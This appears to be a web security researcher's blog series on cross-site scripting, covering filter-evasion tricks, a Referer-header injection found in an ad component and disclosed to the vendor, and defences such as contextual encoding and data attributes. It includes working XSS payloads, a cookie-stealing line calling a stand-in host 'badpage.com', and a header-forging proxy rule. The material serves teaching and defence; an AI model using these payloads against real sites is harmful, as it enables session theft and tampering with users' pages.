XSS

Ways you haven’t stopped my XSS, Number 3 – helped by the browser / website

Apologies for not having written one of these in a while, but I find that one of the challenges here is to not release details about vulnerable sites while they’re still vulnerable – and it can take oh, so long for web developers to get around to fixing these vulnerabilities.

And when they do, often there’s more work to be done, as the fixes are incomplete, incorrect, or occasionally worse than the original problem.

Sometimes, though, the time goes so slowly, and the world moves on in such a way that you realise nobody’s looking for the vulnerable site any more – so publishing details of its flaws, without revealing its identity, should be completely safe.

Helped by the website

So, what sort of attack is actively aided by the website?

Overly-verbose error messages

My favourite “helped by the website” issues are error messages which will politely inform you how your attack failed, and occasionally what you can do to fix it.

Here’s an SQL example:

[image: verbose error page revealing part of the failed SQL statement]

OK, so now I know I have a SQL statement that contains the sequence “' order by type asc, sequence desc” – that tells me quite a lot. There are two fields called “type” and “sequence”. And my single injected quote was enough to demonstrate the presence of SQL injection.

What about XSS help?

There are a few web sites out there that will help you by telling you which characters they can’t handle in their search fields:

[image: error page listing the characters the search field refuses to accept]

Now, the question isn’t “what characters can I use to attack the site?”, but “how do I get those characters into the site?” [Usually it’s as simple as typing them into the URL instead of using the text box; sometimes it’s simply a matter of encoding.]

Over-abundance of encoding / decoding

On the subject of encoding and decoding, I generally advise developers that they should document interface contracts between modules in their code, describing what the data is, what format it’s in, and what isomorphic mapping they have used to encode the data so that it is not possible to confuse it with its surrounding delimiters or code, and so that it’s possible to get the original string back.

An isomorphism, or 1:1 (“one to one”) mapping, in data encoding terms, is a means of making sure that each output can only correspond to one possible input, and vice versa.

Without these contracts, you find that developers are aware that data sometimes arrives in an encoded fashion, and they will do whatever it takes to decode that data. Data arrives encoded? Decode it. Data arrives doubly-encoded? Decode it again. Heck, take the easy way out, as this section of code did:
var input, output;
// split the query string (minus its leading "?") into its parameters
var parms = document.location.search.substr(1).split("&");
input = parms[1];
// keep decoding until the string stops changing
while (input != output) {
    output = input;
    input = unescape(output);
}

[That’s from memory, so I apologise if it’s a little incorrect in many, many other ways as well.]

Yes, the programmer had decided to decode the input string until he got back a string that was unchanged.

This meant that an attacker could simply provide a multiply-encoded attack sequence which gets past any filters you have, such as WAFs and the like, and which the application happily decodes for you.
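
To make that concrete, here’s a minimal sketch of the trick, using the same unescape() as the loop above – the doubly-encoded payload contains nothing a naive filter recognises, but two rounds of decoding produce live HTML:

var payload = "%253Cscript%253E";   // what the filter inspects – no "<" anywhere
var once = unescape(payload);       // "%3Cscript%3E" – still looks harmless
var twice = unescape(once);         // "<script>" – the loop above hands this to the page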

Granted, I don’t think WAFs are much good, compared to actually fixing the code, but they can give you a moment’s peace in which to fix the code, as long as your code doesn’t do things to actively prevent the WAF from being able to help.

Multiple tiers, each decoding

This has essentially the same effect as described above. The request target for an HTTP request may be percent-encoded, and when it is, the server is required to treat it equivalently to the decoded target. This can sometimes have the effect that each server in a multi-tiered service will decode the HTTP request once, achieving the multiple-decode WAF traversal I talk about above.

Spelling correction

[image: Google offering a spelling correction for the injected search term – without executing it]

OK, that one’s just an illustration – and what it illustrates is that Google doesn’t fall for this crap.

But it’s interesting how you’ll find occasionally that such a correction results in executing code.

Stopwords and notwords in searches

When finding XSS in searches, we often concentrate on failed searches – after all, in most product catalogues, there isn’t an item called “<script>prompt()</script>” – unless we put it there on a previous attack.

But often the more complex (and easily attacked) code is in the successful search results – so we want to trigger that page.

Sometimes there’s something called “script”, so we squeak that by (there’s a band called “The Script”, and very often writing on things is described as being in a “script” font), but now we have to build JavaScript with other terms that match the item on display when we find “script”. Fortunately, there’s a list of words that most search engines are trained to ignore – they are called “stopwords”. These are words that don’t impact the search at all, such as “the”, “of”, “to”, “and”, “by”, etc – words that occur in such a large number of matching items that it makes no sense to allow people to search on them. Often colours will appear in the list of stopwords, along with generic descriptions of items in the catalogue (“shirt”, “book”, etc).

Well, “alert” is simply "and"[0]+"blue"[1]+"the"[2]+"or"[1]+"the"[0], so you can build function names quickly from stopwords. Once you have String.fromCharCode as a function object, you can create many more strings and functions more quickly. For an extreme example of this kind of “building JavaScript from minimal characters”, see this page on how to create all JavaScript from eight basic characters (none of which are alphabetical!)
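
As a minimal sketch of the stopword trick – every character below is plucked from a plausible stopword, and the message string is purely illustrative:

var name = "and"[0] + "blue"[1] + "the"[2] + "or"[1] + "the"[0]; // spells "alert"
window[name]("built entirely from stopwords"); // window["alert"](...) – the call still works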

“Notwords” aren’t a thing, but they made the title seem more interesting – sometimes it’d be nice to slip in a string that isn’t a stopword, and isn’t going to be found in the search results. Well, many search functions have a grammar that allows us to say things like “I’d like all your teapots except for the ones made from steel” – or more briefly, “teapot !steel”.

How does this help us execute an attack?

Well, we could just as easily search for “<script> !prompt() </script>” – valid JavaScript syntax, which means “run the prompt() function, and return the negation of its result”. Well, too late, we’ve run our prompt command (or other commands). I even had “book !<script> !prompt()// !</script>” work on one occasion.

Helped by the browser

So, now that we’ve seen some examples of the server or its application helping us to exploit an XSS, what about the browser?

Carry on parsing

One of the fun things I see a lot is servers blocking XSS by ensuring that you can’t enter a complete HTML tag except for the ones they approve of.

So, if I can’t put that closing “>” in my attack, what am I to do? I can’t just leave it out.

Well, strange things happen when you do. Largely because most web pages are already littered with closing angle brackets – they’re designed to close other tags, of course, not the one you’ve put in, but there they are anyway.

So, you inject “<script>prompt()</script>” and the server refuses you. You try “<script prompt() </script” and it’s allowed, but can’t execute.

So, instead, try a single tag, like “<img src=x onerror=prompt()>” – it’s rejected, because it’s a complete tag, so just drop off the terminating angle bracket. “<img src=x onerror=prompt()” – so that the next tag doesn’t interfere, add an extra space, or an “x=”:

<img src=x onerror=prompt() x=

If that gets injected into a <p> tag, it’ll appear as this:

<p><img src=x onerror=prompt() x=</p>

How’s your browser going to interpret that? Simple – open p tag, open img tag with src=x, onerror=prompt() and some attribute called “x”, whose value is “</p”.

If confused, close a tag automatically

Occasionally, browser heuristics and documented standards will be just as helpful to you as the presence of characters in the web page.

Can’t get a “/” character into the page? Then you can’t close a <script> tag. Well, that’s OK, because the <svg> tag can include scripts, and is documented to end at the next HTML tag that isn’t valid in SVG. So… “<svg><script>prompt()<p>” will happily execute as if you’d provided the complete “<svg><script>prompt()</script></svg><p>”

There are many other examples where the browser will use some form of heuristic to “guess” what you meant, or rather to guess what the server meant with the code it sends to the browser with your injected data. See what happens when you leave your attack half-closed.

Can’t comment with // ? Try other comments

When injecting script, you often want to comment the remaining line after your injection, so it isn’t parsed – a failing parse results in none of your injected code being executed.

So, you try to inject “//” to make the rest of the line a comment. Too bad, all “/” characters are encoded or discarded.

Well, did you know that JavaScript in HTML treats “<!--” as a perfectly valid equivalent, at least in classic inline scripts?
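
A quick sketch you can paste into a classic (non-module) inline script to convince yourself – this is legacy behaviour that browsers keep around for compatibility:

var a = 1; <!-- everything after the arrow on this line is a comment, just like //
alert(a); // runs, and shows 1 – the previous line didn't break the script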

Different browsers help in different ways

Try attacks in different browsers – they each behave in subtly different ways.

Firefox doesn’t have an XSS filter. So it won’t prevent XSS attacks that way.

IE 11 doesn’t encode URI elements, so your attack will sometimes work there when another browser would have encoded it into harmlessness.

Chrome – well, I don’t use Chrome often enough to comment on its quirks. Too irritated with it trying to install on my system through Adobe Flash updates.

Well, I think that’s enough for now.

Hack Your Friends Next

My buddy Troy Hunt has a popular PluralSight training class called “Hack Yourself First”. This is excellent advice, as it addresses multiple ideas:

  • You have your own permission to hack your own site, which means you aren’t getting into trouble
  • Before looking outward, you get to see how good your own security is
  • Hacking yourself makes it less likely that when you open up to the Internet, you’ll get pwned
  • By trying a few attacks, you’ll get to see what things an attacker might try and how to fend them off

Plenty of other reasons, I’m sure. Maybe I should watch his training.

Every now and again, though, I’ll hack my friends as well. There are a few reasons for this, too:

  • I know enough not to actually break a site – this is important
  • My friends will generally rather hear from me than an attacker that they have an obvious flaw
  • Tools that I use to find vulnerabilities sometimes stay enabled in the background
  • It’s funny

Such is the way with my recent visit to troyhunt.com – I’ve been researching reflected XSS issues caused by including script in the Referrer header.

What’s the Referrer header?

Actually, there are two places that hold the referrer, and it’s important to know the difference between them, because they get attacked in different ways, and attacks can be simulated in different ways.

The Referrer header (actually misspelled as “Referer”) is an HTTP header that the browser sends as part of its request for a new web page. It contains the URL of the old page that the browser had loaded, and which triggered the browser to fetch the new page.

There are many rules as to when this Referrer header can, and can’t, be sent. It can’t be sent if the user typed a URL. It can’t be sent if the target is HTTP, but the source was HTTPS. But there are still enough places it can be sent that the contents of the Referer header are a source of significant security concern – and why you shouldn’t EVER put sensitive data in the URL or query parameters, even when sending to an HTTPS destination. Even when RESTful.

Forging the Referer when attacking a site is a simple matter of opening up Fiddler (or your other favourite scriptable proxy) and adding a new automatic rule to your CustomRules.js, something like this:

// AMJ – this goes inside the OnBeforeRequest handler in Fiddler's CustomRules.js
if (oSession.oRequest.headers.Exists("Referer")) {
    if (oSession.oRequest.headers["Referer"].Contains("?"))
        oSession.oRequest.headers["Referer"] += "&\"-prompt()-\"";
    else
        oSession.oRequest.headers["Referer"] += "?\"-prompt()-\"";
}
else
    oSession.oRequest.headers["Referer"] = "http://www.example.com?\"-prompt()-\"";

Something like this code was in place when I visited other recently reported vulnerable sites, but Troy’s I hit manually. Because fun.

JavaScript’s document.referrer

The other referrer is in JavaScript, the document.referrer field. I couldn’t find any rules about when this is, or isn’t, available. That suggests it’s available for use even in cases where the HTTP Referer header believes it is not safe to do so, at least in some browser or other.

Forging this is harder, and I’m not going to delve into it. I want you to know about it in case you’ve used the Referer header, and referrer-vulnerable code isn’t triggering – knowing about it avoids tearing your hair out.

Back to the discovery

So, lately I’ve been testing sites with a URL ending in the magic string ?"-prompt()-" – and happened to try it at Troy’s site, among others.

I’d seen a pattern of adsafeprotected.com advertising being vulnerable to this issue. [It’s not the only one by any means, but perhaps the most prevalent.] It’s difficult to reproduce this issue accurately, because advertising mediators will send you to different advertisers each time you visit a site.

And so it was with great surprise that I tried this on Troy’s site and got an immediate hit. Partly because I know Troy will have already tried this on his own site.

Through a URL parameter, I’m injecting script into a hosted component that unwisely includes the Referer header’s contents in its JavaScript without encoding and/or quoting it first.

It’s ONLY Reflected XSS

I hear that one all the time – no big deal, it’s only a reflected XSS, the most you can do with this is to abuse yourself.

Kind of, yeah. Here are some of my reasons why Reflected XSS is important:

  • It’s an obvious flaw – it suggests your code is weak all over
  • It’s easy to fix – if you don’t fix the easy flaws, do you want me to believe you fix the hard ones?
  • An attacker can send a link to your trusted web site in a spam email, and have thousands of your users clicking on it and being exploited
  • It’s like you’ve hired a new developer on your web site – the good news is, you don’t have to pay them. The bad news is, they don’t turn up to design meetings, and may have completely different ideas about how your web site should work
  • The attacker can change content as displayed to your users without you knowing what changes are made
  • The attacker can redirect your users to other malicious websites, or to your competitors
  • The attacker can perform network scans of your users’ systems
  • The attacker can run keylogging – capturing your users’ username and password, for instance
  • The attacker can communicate with your users – with your users thinking it’s you
  • A reflected XSS can often become stored XSS, because you allow users of your forums / reviews / etc to post links to your site “because they’re safe, trusted links”
  • Once an attacker convinces one of your staff to visit the reflected XSS, the attack becomes internal. Your staff will treat the link as “trusted” and “safe”
  • Any XSS will tend to trump your XSRF protections.

So, for multiple values of “self” outside the attacker, you can abuse yourself with Reflected XSS.

Contacting the vendor and resolving

With all security research, there comes a time when you want to make use of your findings, whether to garner yourself more publicity, or to earn a paycheck, or simply to notify the vendor and have them fix something. I prefer the latter, when it’s possible / easy.

Usually, the key is to find an email address at the vulnerable domain – but security@adsafeprotected.com wasn’t working, and I couldn’t find any hints of an actual web site at adsafeprotected.com for me to go look at.

Troy was able to start from the other direction – as the owner of a site showing these adverts, he contacted the advertising agent that puts ads onto his site, and got them to fix the issue.

“Developer Media” was the name of the group, and their guy Chris quickly got onto the issue, as did Jamie from Integral Ads, the owners of adsafeprotected.com. Developer Media pulled adsafeprotected as a source of ads, and Integral Ads fixed their code.

Sites that were previously vulnerable are now not vulnerable – at least not through that exact attack.

I count that as a win.

There’s more to learn here

Finally, some learning.

1. Reputational risk / impact

Your partners can bring you as much risk as your own developers and your own code. You may be able to transfer risk to them, but you can’t transfer reputational risk as easily. With different notifications, Troy’s brand could have been substantially damaged, as could Developer Media’s and Integral Ads’. As it is, they all responded quickly, quietly and appropriately, reducing the reputational impact.

[As for my own reputational impact – you’re reading this blog entry, so that’s a positive.]

2. Good guy / bad guy hackers

This issue was easy to find. So it’s probably been in use for a while by the bad guys. There are issues like this at multiple other sites, not related to adsafeprotected.

So you should test your site and see if it’s vulnerable to this, or similar, code. If you don’t feel like you’ll do a good job, employ a penetration tester or two.

3. Reducing risk by being paranoid (iframe protection)

There’s a thin line between “paranoia” and “good security practice”. Troy’s blog uses good security practice, by ensuring that all adverts are inside an iframe, where they can’t execute in Troy’s security context. While I could redirect his users, perhaps to a malicious or competing site, I wasn’t able to read his users’ cookies, or modify content on his blog.

There were many other hosts using adsafeprotected without being in an iframe.

Make it a policy that all externally hosted content (beyond images) is required to be inside of an iframe. This acts like a firewall between your partners and you.
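
A minimal sketch of what that policy looks like in the page – the ad URL is hypothetical, and the sandbox attribute is a belt-and-braces step on top of the cross-origin iframe:

<iframe src="https://ads.partner.example/slot1" width="300" height="250"
        sandbox="allow-scripts"></iframe>

Because the frame’s content comes from a different origin (and sandbox without allow-same-origin forces a unique origin), script running in the ad can’t read your cookies or rewrite your page.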

4. Make yourself findable

If you’re a developer, you need to have a security contact, and that contact must be findable from any angle of approach. Security researchers will not spend much time looking for your contact information.

Ideally, for each domain you handle, have the address security@example.com (where you replace “example.com” with your domain) point to a monitored email address. This will be the FIRST thing a security researcher will try when contacting you. Finding the “Contact Us” link on your web page and filling out a form is farther down on the list of things a researcher will do. Such a researcher usually has multiple findings they’re working on, and they’ll move on to notifying someone else rather than spend time looking for how to notify you.

5. Don’t use “safe”, “secure”, “protected” etc in your domain name

This just makes it more ironic when the inevitable vulnerability is found.

6. Vulns protected by XSS Filter are still vulns

As Troy notes, I did have to disable the XSS Filter in order to see this vuln happen.

That doesn’t make the vuln any less important to fix – all it means is that to exploit it, I have to find customers who have also disabled the XSS Filter, or find a way to evade the filter.

There are many sites advising users how to disable the XSS Filter, for various (mostly specious) reasons, and there are new ways every day to evade the filter.

7. Ad security is HARD

The web ad industry is at a crisis point, from my perspective.

Flash has what appear to be daily vulnerabilities, and yet it’s still seen to be the medium of choice for online advertising.

Even without vulnerabilities in Flash, its programmability lends it to being used by bad guys to distribute malicious software. There are logic-based and time-based exploits (display a ‘good’ ad when inspected by the ad hosting provider; display a bad ad, or do something malicious when displayed on customers’ computers) which attackers will use to ensure that their ad passes rigorous inspection, but still deploys bad code to end users.

Any ad that uses JavaScript is susceptible to common vulnerability methods.

Ad blockers are being run by more and more people – even institutions (one college got back 40% of their network bandwidth by employing ad blocking).

Web sites need to be funded. If you’re not paying for the content, someone is. How is that to be done except through advertising? [Maybe you have a good idea that hasn’t been tried yet]

8. Timing of bug reports is a challenge

I’ll admit, I was bored when I found the bug on Troy’s site on a weekend. I decided to contact him straight away, and he responded immediately.

This led to Developer Media being contacted late on a Sunday.

This is not exactly friendly of me and Troy – but at least we didn’t publish, and left it to the developers to decide whether to treat this as a “fire drill”.

A good reason, indeed, to use responsible / coordinated disclosure, and make sure that you don’t publish until teams are actively working on / have resolved the problem.

9. Some browsers are safer – that doesn’t mean your web site is safe

There are people using old and poorly configured browsers everywhere. Perhaps they make up 0.1% of your users. If you have 100,000 users, that’s a hundred people who will be affected by issues with those browsers.

Firefox escaped because it encoded the quote characters to %22, and the server at adsafeprotected didn’t decode them. Technically, adsafeprotected’s server is not RFC compliant because of this, so Firefox isn’t really protecting anyone here – the escape was an accident of the server’s own bug.

Chrome escaped because it encoded the quote characters AND has an XSS filter to block things like my attack. This is not 100% safe, and can be disabled easily by the user.

Internet Explorer up to version 11 escaped if you leave the XSS Filter turned on.

Microsoft Edge in Windows 10 escaped because it encodes the quote characters and has a robust XSS Filter that, as far as I can tell, you can’t turn off.

All these XSS filters can be turned off by setting a header in network traffic.
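
The header in question is X-XSS-Protection – a response carrying this line tells the browser’s filter to stand down:

X-XSS-Protection: 0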

Nobody would do that.

Until such time as one of these browsers has a significant flaw in their XSS filter.

So, don’t rely on the XSS Filter to protect you – it can’t be complete, and it may wind up being disabled.

HTML data attributes – stop my XSS

First, a disclaimer for the TL;DR crowd – data attributes alone will not stop all XSS, mine or anyone else’s. You have to apply them correctly, and use them properly.

However, I think you’ll agree with me that it’s a great way to store and reference data in a page, and that if you only handle user data in correctly encoded data attributes, you have a greatly-reduced exposure to XSS, and can actually reduce your exposure to zero.

Next, a reminder about my theory of XSS – that there are four parts to an XSS attack – Injection, Escape, Attack and Cleanup. Injection is necessary and therefore can’t be blocked, Attacks are too varied to block, and Cleanup isn’t always required for an attack to succeed. Clearly, then, the Escape is the part of the XSS attack quartet that you can block.

Now let’s set up the code we’re trying to protect – say we want to have a user-input value accessible in JavaScript code. Maybe we’re passing a search query to Omniture (by far the majority of JavaScript Injection XSS issues I find). Here’s how it often looks:

<script>
s.prop1="mysite.com";
s.prop2="SEARCH-STRING";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//-->
</script>

Let’s suppose that “SEARCH-STRING” above is the string for which I searched.

I can inject my code as a search for:

"-window.open("//badpage.com/"+document.cookie,"_top")-"

The second line then becomes:

s.prop2=""-window.open("//badpage.com/"+document.cookie,"_top")-"";

Yes, I know you can’t meaningfully subtract two strings, but JavaScript doesn’t care – it has to evaluate the window.open() function to get something to subtract, and by then it’s too late, because it’s already executed the bad thing (the subtractions themselves just quietly produce NaN). A more sensible language would have thrown an error at compile time, but this is just another reason for security guys to hate dynamic languages.

How do data attributes fix this?

A data attribute is an attribute in an HTML tag, whose name begins with the word “data” and a hyphen.

These data attributes can be on any HTML tag, but usually they sit in a tag which they describe, or which is at least very close to the portion of the page they describe.

Data attributes on table cells can be associated to the data within that cell, data attributes on a body tag can be associated to the whole page, or the context in which the page is loaded.

Because data attributes are HTML attributes, quoting their contents is easy. In fact, there are really only a few quoting rules to consider.

  1. The attribute’s value must be quoted, either in double-quote or single-quote characters, but usually in double quotes because of XHTML
  2. Any ampersand (“&”) characters need to be HTML encoded to “&amp;”.
  3. Quote characters occurring in the value must be HTML encoded to “&quot;”.

Rules 2 & 3 can simply be replaced with “HTML encode everything in the value other than alphanumerics” before applying rule 1, and if that’s easier, do that.
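
Here’s a minimal sketch of those rules in JavaScript – userSearchTerm is a stand-in for whatever untrusted value you’re emitting:

function htmlAttributeEncode(value) {
    return String(value)
        .replace(/&/g, "&amp;")    // rule 2 – encode the encoding character first
        .replace(/"/g, "&quot;");  // rule 3 – then the delimiter quote
}
// rule 1 – you supply the surrounding double quotes yourself:
var tag = '<div id="myDataDiv" data-search-term="'
        + htmlAttributeEncode(userSearchTerm) + '"></div>';

The order matters: encode the ampersands before the quotes, or you’ll mangle the “&” that “&quot;” itself needs.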

Sidebar – why those rules?

HTML parses attribute value strings very simply – look for the first non-space character after the “=” sign, which is either a quote or not a quote. If it’s a quote, find another one of the same kind, HTML-decode what’s in between them, and that’s the attribute’s value. If the first non-space after the equals sign is not a quote, the value ends at the next whitespace character or “>”.
Contemplate how these are parsed, and then see if you’re right:

  • <a onclick="prompt("1")">

  • <a onclick = "prompt( 1 )">

  • <a onclick= prompt( 1 ) >

  • <a onclick= prompt(" 1 ") >

  • <a onclick= prompt( "1" ) >

  • <a onclick=&#9;"prompt( 1 )">

  • <a onclick=&#32;"prompt( 1 )">

  • <a onclick= thing=1;prompt(thing)>

  • <a onclick="prompt(\"1\")">

Try each of them (they aren’t live in this document – you should paste them into an HTML file and open it in your browser), see which ones prompt when you click on them. Play with some other formats of quoting. Did any of these surprise you as to how the browser parsed them?

Here’s how they look in the Debugger in Internet Explorer 11:

[image: the nine anchor tags in IE11’s Debugger, with confused syntax colouring]

Uh… That’s not right, particularly line 8. Clearly syntax colouring in IE11’s Debugger window needs some work.

OK, let’s try the DOM Explorer:

[image: the same tags in IE11’s DOM Explorer – attribute names in red, attribute values in blue]

Much better – note how the DOM explorer reorders some of these attributes, because it’s reading them out of the Document Object Model (DOM) in the browser as it is rendered, rather than as it exists in the source file. Now you can see which are interpreted as attribute names (in red) and which are the attribute values (in blue).

Other browsers have similar capabilities, of course – use whichever one works for you.

Hopefully this demonstrates why you need to follow the rules of 1) quoting with double quotes, 2) encoding any ampersand, and 3) encoding any double quotes.

Back to the data-attributes

So, now if I use those data-attributes, my HTML includes a number of tags, each with one or more attributes named “data-something-or-other”.

Accessing these tags from basic JavaScript is easy. You first need to get access to the DOM object representing the tag – if you’re operating inside of an event handler, you can simply use the “this” object to refer to the object on which the event is handled (so you may want to attach the data-* attributes to the object which triggers the handler).

If you’re not inside of an event handler, or you want to get access to another tag, you should find the object representing the tag in some other way – usually document.getElementById(…)

Once you have the object, you can query an attribute with the function getAttribute(…) – the single argument is the name of the attribute, and what’s returned is a string – and any HTML encoding in the data-attribute will have been decoded once.

Other frameworks have ways of accessing this data attribute more easily – for instance, jQuery has a “.data(…)” function which will fetch a data attribute’s value.
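
A minimal sketch, using the same element names as the Omniture example further down:

var div = document.getElementById("myDataDiv");
var term = div.getAttribute("data-search-term"); // HTML-decoded once by the parser
var same = div.dataset.searchTerm;  // the dataset map renames data-search-term to searchTerm
// with jQuery: $("#myDataDiv").data("search-term")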

How this stops my XSS

I’ve noted before that stopping XSS is a “simple” matter of finding where you allow injection, and preventing, in a logical manner, every possible escape from the context into which you inject that data, so that it cannot possibly become code.

If all the data you inject into a page is injected as HTML attribute values or HTML text, you only need to know one function – HTML Encode – and whether you need to surround your value with quotes (in a data-attribute) or not (in HTML text). That’s a lot easier than trying to understand multiple injection contexts each with their own encoding function. It’s a lot easier to protect the inclusion of arbitrary user data in your web pages, and you’ll also gain the advantage of not having multiple injection points for the same piece of data. In short, your web page becomes more object-oriented, which isn’t a bad thing at all.

One final gotcha

You can still kick your own arse.

When converting user input from the string you get from getAttribute to a numeric value, what function are you going to use?

Please don’t say “eval”.

Eval is evil. Just like innerHTML and document.write, its use is an invitation to Cross-Site Scripting.

Use parseFloat() and parseInt(), because they won’t evaluate function calls or other nefarious components in your strings.
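
A minimal sketch – the data-item-count attribute here is hypothetical:

var raw = document.getElementById("myDataDiv").getAttribute("data-item-count");
var count = parseInt(raw, 10);   // always pass the radix; parses leading digits only
if (isNaN(count)) { count = 0; } // anything that wasn't a number is rejected, not executed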

So, now I’m hoping your Omniture script looks like this:

<div id="myDataDiv" data-search-term="SEARCH-STRING"></div>
<script>
s.prop1="mysite.com";
s.prop2=document.getElementById("myDataDiv").getAttribute("data-search-term");
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//-->
</script>

You didn’t forget to HTML encode your SEARCH-STRING, or at least its quotes and ampersands, did you?

P.S. Omniture doesn’t cause XSS, but many people implementing its required calls do.

Ways you haven’t stopped my XSS, Number 2 – backslash doesn’t encode quotes in HTML attributes

Last time in this series, I posted an example where XSS was possible because a site’s developer was unaware of the implications of his JavaScript being hosted inside HTML.

This is sort of the opposite of that, noting that time-worn JavaScript (and C, Java, C++, C#, etc) methods don’t always apply to HTML.

The XSS mantra for HTML attributes

I teach that XSS is prevented absolutely by appropriate contextual encoding of user data on its way out of your application and into the page.

The context dictates what encoding you need, whether the context is “JavaScript string”, “JavaScript code”, “HTML attribute”, “HTML content”, “URL”, “CSS expression”, etc, etc.

In the case of HTML attributes, it’s actually fairly simple.

Unless you are putting a URL into an attribute, there are three simple rules:

  1. Every attribute’s value must be quoted, whether with single quotes or double quotes.
  2. If the quote you use appears in the attribute value, it must be encoded.
  3. You must encode any characters which could confuse the encoding. [Encode the encoding characters]

Seems easy, right?

This is all kinds of good, except when you run into a site where the developer hasn’t really thought about their encoding very well.

You see, HTML attribute values are encoded using HTML encoding, not C++ encoding.

To HTML, the back-slash has no particular meaning.

I see this all the time – I want to inject script, but the site only lets me put user data into an attribute value:

<meta name="keywords" content="Wot I searched for">

That’s lovely. I’d like to put "><script>prompt(1)</script> in there as a proof of concept, so that it reads:

<meta name="keywords" content=""><script>prompt(1)</script>">

The dev sees this, and cuts me off, by preventing me from ending the quoted string that makes up the value of the content attribute:

<meta name="keywords" content="\"><script>prompt(1)</script>">

Nice try, Charlie, but that back-slash, it’s just a back-slash. It means nothing to HTML, and so my quote character still ends the string. My prompt still executes, and you have to explain why your ‘fix’ got broken as soon as you released it.

Oh, if only you had chosen the correct HTML encoding, and replaced my quote with “&quot;” [and therefore also replaced every “&” in my query with “&amp;”], we’d be happy.

And this, my friends, is why every time you implement a mitigation, you must test it. And why you follow the security team’s guidance.

Exercise for the reader – how do you exploit this example if I don’t encode the quotes, but I do strip out angle brackets?

Ways you haven’t stopped my XSS – Number 1, JavaScript Strings

I saw this again today. I tried smiling, but could only manage a weak grin.

You think you’ve defeated my XSS attack. How did you do that?

Encoding or back-slash quoting the back-slash and quote characters in JavaScript strings

Sure, I can no longer turn this:

<script>
s_prop0="[user-input here]";
</script>

into this, by providing user input that consists of ";nefarious();// :

<script>
s_prop0="";nefarious();//";
</script>

Instead, I get this:

<script>
s_prop0="\";nefarious();//";
</script>

But, and this surprises many web developers, if that’s all you’ve done, I can still close that script tag.

INSIDE THE STRING

Yes, that’s bold, italic and underlined, because developers see this, and think “I have no idea how to parse this”:

<script>
s_prop0="</script><script>nefarious();</script>";
</script>

Fortunately, your browser does.

First it parses it as HTML.

This is important.

The HTML parser knows nothing about your JavaScript, it uses HTML rules to parse HTML bodies, and to figure out where scripts start and end.

So, when the HTML parser sees “<script>”, it creates a buffer. It starts filling that buffer with the first character after the tag, and it ends it with whatever character precedes the very next “</script>” tag it sees.

This means the HTML above gets interpreted as:

1. a block of script that won’t run, because it’s not complete code and generates a syntax error.

s_prop="

2. a block of script that will run, because it parses properly.

nefarious();

3. a double-quote character, a semi-colon, and an unnecessary end tag that it discards

Obviously, your code is more complex than mine, so this kind of injection has all kinds of nasty effects – but it’s possible for an attacker to hide those (not that the attacker needs to!)

So then, the fix is … what?

If you truly have to insert data from users into a JavaScript string, remember what it’s embedded in – HTML.

There are three approaches:

  1. Validate.

    If at all possible, discard characters willy-nilly. Does the user really need to input anything other than alphanumeric characters and spaces? Maybe you can just reject all those other characters.
  2. Encode.

    Yeah, you fell afoul of encoding, but let’s think about it scientifically this time.

    What are you embedded in? A JavaScript string embedded in HTML. You can’t HTML-encode your JavaScript content (try it and you’ll see it doesn’t work that way), so you have to JavaScript-string-encode anything that might make sense either to the HTML parser OR the JavaScript parser.

    You know I don’t like blacklists, but in this case, the only characters you actually need to encode are the double-quote, the back-slash (because otherwise you can’t uniquely reverse the encoding), and either the less-than or forward-slash.

    But, since I don’t like blacklists, I’d rather you chose to encode everything other than alphanumerics and spaces – it doesn’t cost that much. [There’s a sketch of this after the list.]

  3. Span / Div.

    OK, this is a weird idea, but if you care to follow me, how about putting the user-supplied data into a hidden <span> or <div> element?

    Give it an id, and the JavaScript can reference it by that id. This means you only have to protect the user-supplied data in one place, and it won’t appear a dozen times throughout the document.
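
Here’s a minimal sketch of the approach in item 2 – encode everything outside the whitelist as a JavaScript \uNNNN escape, which is inert to the HTML parser but decodes back to the original characters at runtime:

function jsStringEncode(s) {
    return String(s).replace(/[^A-Za-z0-9 ]/g, function (c) {
        return "\\u" + ("000" + c.charCodeAt(0).toString(16)).slice(-4);
    });
}
// "</script>" becomes "\u003c\u002fscript\u003e" – the HTML parser never sees
// a "<", so the enclosing <script> block can't be terminated early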

A note on why I don’t like the blacklists

OK, aside from last weekend’s post, where I demonstrated how a weak blacklist is no defence, it’s important to remember that the web changes day by day. Not every browser is standard, and they each try to differentiate themselves from the other browsers by introducing “killer features” that the other browsers don’t have for a few weeks.

As a result, you can’t really rely on the HTML standard as the one true documentation of all things a browser may do to your code.

Tags change, who knows if tomorrow a <script> tag might not be “pausable” by a <pause>Some piece of text</pause> tag? Ludicrous, maybe, until someone decides it’s a good idea. Or something else.

As a result, if you want to be a robust developer who produces robust code, you need to think less in terms of “what’s the minimum I have to encode?”, and more in terms of “what’s the cost of encoding, and what’s the cost of failure if I don’t encode something that needs it?”

In which a coffee store learns not to blacklist

I’ve been playing a lot lately with cross-site scripting (XSS) – you can tell that from my previous blog entries, and from the comments my colleagues make about me at work.

Somehow, I have managed to gain a reputation for never leaving a search box without injecting code into it.

And to a certain extent, that’s deserved.

But I always report what I find, and I don’t blog about it until I’m sure the company has fixed the issue.

So, coffee store, we’re talking Starbucks, right?

Right, and having known a few people who’ve worked in the Starbucks security team, I was surprised that I could find anything at all.

Yet it practically shouted at me, as soon as I started to inject script:

[image: the injected script takes me straight to an “oops” error page]

Well, there’s pretty much a hint that Starbucks have something in place to prevent script.

But it’s not the only thing preventing script, as I found with a different search:

[image: a different search – the results page loads, but the script doesn’t execute]

So, one search takes me to an “oops” page, another takes me to a page telling me that nothing happened – but without either one executing the script.

The oops page doesn’t include any of my script, so I don’t like that page – it doesn’t help my injection at all.

The search results page, however, that includes some of my script, so if I can just make that work for me, I’ll be happy.

Viewing source is pretty helpful, so here’s what I get from that, plus searching for my injected script:

[image: the page source – every character of the injected string made it through intact]

So, while my intended JavaScript, “"-prompt(1)-"”, is not executed, and indeed is in the wrong context to be executed, every character has successfully made it into the source sent back to the user’s browser.

At this point, I figure that I need to find some execution that is appropriate for this context.

Maybe the XSS fish will help, so I search for that:

[image: searching for the XSS fish – no “oops” page this time]

Looks promising – no “oops”, let’s check the source:

[image: the page source – the fish’s tag survives unencoded]

This is definitely working. At this point, I know the site has XSS, I just have to demonstrate it. If I were a security engineer at Starbucks, this would be enough to make me go and beat some heads together.

I think I should stress that. If you ever reach this point, you should fix your code.

